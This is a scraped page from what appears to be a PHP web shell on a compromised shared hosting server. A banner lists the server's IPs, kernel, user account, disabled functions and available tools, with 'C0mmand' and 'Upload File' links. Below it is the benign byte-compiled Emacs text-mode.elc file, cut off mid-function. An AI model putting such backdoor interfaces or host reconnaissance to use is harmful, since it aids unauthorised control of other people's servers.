Server IP : 111.118.215.189 / Your IP : 18.117.158.174 Web Server : Apache System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : a1673wkz ( 2475) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/emacs/24.3/lisp/textmodes/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
;ELC ;;; Compiled by mockbuild@buildfarm06-new.corp.cloudlinux.com on Fri Oct 11 10:12:51 2024 ;;; from file /builddir/build/BUILD/emacs-24.3/lisp/textmodes/text-mode.el ;;; in Emacs version 24.3 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@65 Normal hook run when entering Text mode and many related modes. (custom-declare-variable 'text-mode-hook nil '(#$ . 560) :type 'hook :options '(turn-on-auto-fill turn-on-flyspell) :group 'wp) #@105 Non-nil if this buffer's major mode is a variant of Text mode. Use (derived-mode-p 'text-mode) instead. (defvar text-mode-variant nil (#$ . 759)) #@41 Syntax table used while in `text-mode'. (defvar text-mode-syntax-table (byte-code "\301 \302\303\304#\210\302\305\304#\210\302\306\307#\210)\207" [st make-syntax-table modify-syntax-entry 34 ". " 92 39 "w p"] 4) (#$ . 911)) #@151 Keymap for `text-mode'. Many other modes, such as `mail-mode', `outline-mode' and `indented-text-mode', inherit all the commands defined in this map. (defvar text-mode-map (byte-code "\301 \302\303\304#\210)\207" [map make-sparse-keymap define-key " " ispell-complete-word] 4) (#$ . 1149)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\305\306!\204 \302\306\307\310#\210\300\207" [text-mode-hook variable-documentation put purecopy "Hook run when entering Text mode.\nNo problems result if this variable is not bound.\n`add-hook' automatically binds it. (This is true for all hook variables.)" boundp text-mode-map definition-name text-mode] 5) (defvar text-mode-map (make-sparse-keymap)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\305\306!\204 \302\306\307\310#\210\300\207" [text-mode-map variable-documentation put purecopy "Keymap for `text-mode'." boundp text-mode-syntax-table definition-name text-mode] 5) (defvar text-mode-syntax-table (make-syntax-table)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\302\305\306\307#\207" [text-mode-syntax-table variable-documentation put purecopy "Syntax table for `text-mode'." text-mode-abbrev-table definition-name text-mode] 5) (defvar text-mode-abbrev-table (progn (define-abbrev-table 'text-mode-abbrev-table nil) text-mode-abbrev-table)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\302\305\306\307#\207" [text-mode-abbrev-table variable-documentation put purecopy "Abbrev table for `text-mode'." text-mode derived-mode-parent nil] 5) #@299 Major mode for editing text written for humans to read. In this mode, paragraphs are delimited only by blank or white lines. You can thus get the full benefit of adaptive filling (see the variable `adaptive-fill-mode'). \{text-mode-map} Turning on Text mode runs the normal hook `text-mode-hook'. (defalias 'text-mode #[nil "\306\300!\210\307\310 \210\311\312\313!\210\314\f!\210 \306\315!\210\307 \306\316!\210\306\317!\210\320)\321\322!\207" [delay-mode-hooks major-mode mode-name text-mode-map text-mode-syntax-table text-mode-abbrev-table make-local-variable t kill-all-local-variables text-mode "Text" use-local-map set-syntax-table text-mode-variant require-final-newline indent-line-function indent-relative run-mode-hooks text-mode-hook local-abbrev-table mode-require-final-newline] 2 (#$ . 2687) nil]) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\305\306!\204 \302\306\307\310#\210\300\207" [paragraph-indent-text-mode-hook variable-documentation put purecopy "Hook run when entering Parindent mode.\nNo problems result if this variable is not bound.\n`add-hook' automatically binds it. (This is true for all hook variables.)" boundp paragraph-indent-text-mode-map definition-name paragraph-indent-text-mode] 5) (defvar paragraph-indent-text-mode-map (make-sparse-keymap)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\302\305\306\307#\207" [paragraph-indent-text-mode-map variable-documentation put purecopy "Keymap for `paragraph-indent-text-mode'." paragraph-indent-text-mode derived-mode-parent text-mode] 5) #@430 Major mode for editing text, with leading spaces starting a paragraph. In this mode, you do not need blank lines between paragraphs when the first line of the following paragraph starts with whitespace. `paragraph-indent-minor-mode' provides a similar facility as a minor mode. Special commands: \{text-mode-map} Turning on Paragraph-Indent Text mode runs the normal hooks `text-mode-hook' and `paragraph-indent-text-mode-hook'. (defalias 'paragraph-indent-text-mode #[nil "\304\300!\210\305\306 \210\307\310\306\311N\203 \312\307\311\306\311N#\210\313!\204'